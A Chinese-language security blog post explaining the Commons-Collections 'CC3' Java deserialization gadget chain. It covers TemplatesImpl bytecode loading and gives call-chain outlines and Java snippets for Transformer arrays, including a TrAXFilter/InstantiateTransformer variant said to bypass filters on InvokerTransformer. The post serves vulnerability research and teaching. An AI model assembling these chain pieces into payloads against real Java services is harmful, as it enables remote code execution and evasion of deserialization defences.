<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ka1t4v.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="CC3链分析 字节码加载 cc3链引入了TemplatesImpl来加载字节码这个概念">
<meta property="og:type" content="article">
<meta property="og:title" content="Commons-Collections反序列化链分析-3">
<meta property="og:url" content="https://ka1t4v.github.io/2022/04/13/Commons-Collections_3%E9%93%BE%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Ka1t4v">
<meta property="og:description" content="CC3链分析 字节码加载 cc3链引入了TemplatesImpl来加载字节码这个概念">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/image-20220418204815453.png">
<meta property="og:image" content="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/image-20220421195012442.png">
<meta property="article:published_time" content="2022-04-13T07:46:25.000Z">
<meta property="article:modified_time" content="2022-07-28T09:30:44.941Z">
<meta property="article:author" content="Ka1t4v">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/image-20220418204815453.png">

<link rel="canonical" href="https://ka1t4v.github.io/2022/04/13/Commons-Collections_3%E9%93%BE%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Commons-Collections反序列化链分析-3 | Ka1t4v</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ka1t4v</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ka1t4v.github.io/2022/04/13/Commons-Collections_3%E9%93%BE%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/config/avatar.jpg">
      <meta itemprop="name" content="Ka1t4v">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ka1t4v">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Commons-Collections反序列化链分析-3
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-04-13 15:46:25" itemprop="dateCreated datePublished" datetime="2022-04-13T15:46:25+08:00">2022-04-13</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Java/" itemprop="url" rel="index"><span itemprop="name">Java</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1>CC3链分析</h1>
<p><strong>字节码加载</strong></p>
<p>cc3链引入了TemplatesImpl来加载字节码这个概念</p>
<span id="more"></span>
<p>一个.java经过编译后生成.class那么.class文件中存放的就是字节码，然后根据字节码来加载相应的java类，源生ClassLoader实现了加载字节码的函数defineClass但是由于其是私有方法，无法被调用，那么只能寻求其他重写defineClass方法的类来调用加载java类</p>
<p><strong>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</strong></p>
<p>这个类中定义了一个内部类 TransletClassLoader</p>
<p>这个类里重写了 defineClass 方法，并且这里没有显式地声明其定义域。Java中默认情况下，如果一个 方法没有显式声明作用域，其作用域为default。所以也就是说这里的 defineClass 由其父类的 protected类型变成了一个default类型的方法，可以被类外部调用</p>
<p><strong>那么只要调用defineClass方法加载字节码，然后调用显示构造方法newInstance，就可以执行恶意类中的代码</strong></p>
<p>之前也说过TemplatesImpl的字节码加载调用链</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#getOutputProperties() </span><br><span class="line">   -&gt; TemplatesImpl#newTransformer() </span><br><span class="line">      -&gt; TemplatesImpl#getTransletInstance() </span><br><span class="line">         -&gt; TemplatesImpl#defineTransletClasses() </span><br><span class="line">            -&gt; TransletClassLoader#defineClass()</span><br></pre></td></tr></table></figure>
<p>defineClass方法就可以加载一个class，但是并不会进行初始化，即不会执行static代码块中的代码，需要显示调用构造函数才可以进行初始化，正好TransletClassLoader类中不但调用了defineClass方法，并且进行了newInstance，所以使得构造的字节码完成了初始化，造成代码执行</p>
<p><img src="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/image-20220418204815453.png" alt="image-20220418204815453"></p>
<p>由于只有TemplatesImpl#getOutputProperties()和TemplatesImpl#newTransformer()为public函数，所以一般以这两个函数为起点</p>
<h2 id="构造基本利用链"><a class="header-anchor" href="#构造基本利用链">¶</a>构造基本利用链</h2>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Gadget chain:</span><br><span class="line">-&gt;AnnotationInvocationHandler#readObject()</span><br><span class="line"> -&gt;Map(Proxy)#entrySet()</span><br><span class="line">  -&gt;AnnotationInvocationHandler#invoke()</span><br><span class="line">   -&gt;LazyMap#get()</span><br><span class="line">    -&gt;Transformer#transform()</span><br><span class="line">     -&gt;TemplatesImpl#newTransformer() </span><br><span class="line">      -&gt;arbitrary bytecode load</span><br></pre></td></tr></table></figure>
<p>所以说cc3的链source和cc1是一样的还是利用了AnnotationInvocationHandler类</p>
<p>对于TemplatesImpl类的利用链一般是从<strong>newTransformer</strong>这个方法开始利用的</p>
<p>那么就可以构造一个TemplatesImpl对象，这里的eval为恶意类的字节码，构造完成后，触发条件就是调用newTransformer函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">TemplatesImpl</span> <span class="variable">obj</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">setFieldValue(obj, <span class="string">&quot;_bytecodes&quot;</span>, <span class="keyword">new</span> <span class="title class_">byte</span>[][] &#123;eval&#125;);</span><br><span class="line">setFieldValue(obj, <span class="string">&quot;_name&quot;</span>, <span class="string">&quot;HelloTemplatesImpl&quot;</span>);</span><br><span class="line">setFieldValue(obj, <span class="string">&quot;_tfactory&quot;</span>, <span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br></pre></td></tr></table></figure>
<p>所以只需要修改transformer数组中的加载类就可以了，之前一直使用的Runtime类来执行exec方法，修改后传入TemplatesImpl加载字节码，然后再运行其方法newTransformer即可造成恶意字节码加载</p>
<p>只需将transformer[]数组修改为</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123; </span><br><span class="line">                    <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(obj), </span><br><span class="line">                    <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;newTransformer&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>) &#125;;</span><br></pre></td></tr></table></figure>
<p>剩下的和cc1一样</p>
<h2 id="构造变种利用链"><a class="header-anchor" href="#构造变种利用链">¶</a>构造变种利用链</h2>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Gadget chain:</span><br><span class="line">-&gt;AnnotationInvocationHandler#readObject()</span><br><span class="line"> -&gt;Map(Proxy)#entrySet()</span><br><span class="line">  -&gt;AnnotationInvocationHandler#invoke()</span><br><span class="line">   -&gt;LazyMap#get()</span><br><span class="line">    -&gt;Transformer#transform()</span><br><span class="line">     -&gt;TrAXFilter#TrAXFilter()</span><br><span class="line">       -&gt;TemplatesImpl#newTransformer() </span><br><span class="line">        -&gt;arbitrary bytecode load</span><br></pre></td></tr></table></figure>
<p>但某些过滤器对于InvokerTransformer方法进行了过滤，使得这个方法不能够再使用了</p>
<p>那么就需要用到新的实现了Transformer接口的类</p>
<p><strong>org.apache.commons.collections.functors.InstantiateTransformer</strong></p>
<p>InstantiateTransformer也是⼀个实现了Transformer接⼝的类，他的作⽤就是调⽤指定类的构造⽅法</p>
<p>然后需要用到</p>
<p><strong>com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</strong></p>
<p>该类的构造方法中调用了**(TransformerImpl) templates.newTransformer()**，并且templates可控</p>
<p>正好可以触发TemplatesImpl#newTransformer()的字节码加载</p>
<p><img src="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/image-20220421195012442.png" alt="image-20220421195012442"></p>
<p>就可以和InstantiateTransformer结合起来，在TrAXFilter类的构造函数中就可以触发恶意字节码加载</p>
<p>那么只需将transformer[]修改为</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123; </span><br><span class="line">                 <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(TrAXFilter.class), </span><br><span class="line">                 <span class="keyword">new</span> <span class="title class_">InstantiateTransformer</span>( <span class="keyword">new</span> <span class="title class_">Class</span>[] &#123; Templates.class &#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[] &#123; obj &#125;) &#125;;</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/04/12/Commons-Collections_1%E9%93%BE%E5%88%86%E6%9E%90/" rel="prev" title="Commons-Collections反序列化链分析-1">
      <i class="fa fa-chevron-left"></i> Commons-Collections反序列化链分析-1
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/04/17/Commons-Collections_5%E9%93%BE%E5%88%86%E6%9E%90/" rel="next" title="Commons-Collections反序列化链分析-5">
      Commons-Collections反序列化链分析-5 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">CC3链分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E9%80%A0%E5%9F%BA%E6%9C%AC%E5%88%A9%E7%94%A8%E9%93%BE"><span class="nav-number">1.1.</span> <span class="nav-text">构造基本利用链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E9%80%A0%E5%8F%98%E7%A7%8D%E5%88%A9%E7%94%A8%E9%93%BE"><span class="nav-number">1.2.</span> <span class="nav-text">构造变种利用链</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ka1t4v"
      src="https://ka1t4v.oss-cn-zhangjiakou.aliyuncs.com/config/avatar.jpg">
  <p class="site-author-name" itemprop="name">Ka1t4v</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">39</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ka1t4v" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ka1t4v" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ka1t4v@gmail.com" title="E-Mail → mailto:ka1t4v@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2022 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ka1t4v</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
